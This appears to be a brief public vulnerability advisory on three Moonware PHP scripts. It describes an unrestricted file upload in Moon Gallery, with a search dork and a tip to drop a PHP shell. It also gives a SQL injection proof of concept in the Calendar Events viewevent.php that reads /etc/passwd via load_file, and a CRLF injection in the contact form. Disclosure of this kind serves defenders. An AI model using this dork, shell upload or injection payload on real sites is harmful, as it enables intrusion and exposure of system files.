Moonware Software Multiple Vulnerabilities by s0cratex -------- MSN: s0cratex[at]nasa[dot]gov Moonware Homepage: http://dalemooney.lost-soldiers.com I. Moon Gallery ---- ------- Bug: Arbitrary file upload Dork: "Powered by: Dale Mooney Gallery" Details: The file /config/upload.php don't have any restriction, 6:$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 8:if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { U can upload a PHP Shell and found it in the subdir /images/ II. Calendar Events -------- ------ Bug: SQL Injections Details: The variable $get is not verified in the file viewevent.php. (We need magic_quotes_gpc = Off) 8:$get = mysql_query("SELECT * FROM cal_events WHERE id = '$id'"); p0c: viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/* III. Moonware Contact Form -------- ------- ---- Bug: CRLF Injection Details: File contact.php line 26-35 if($Submit){ $to = $email; $subject = $_POST["subject"]; $email = $_POST["email"]; $message = $_POST["message"]; $name = $_POST["name"]; $datetime = date("D, d M Y H:i:s"); $finalmessage = "Message from: $name \n Subject: $subject \n Email: $email \n Date Sent: $datetime \n Message:\n\n $message"; 44:$sent = mail($to,$subject,$finalmessage); The vars are not verified and i can insert \r\n... oops!! #EOF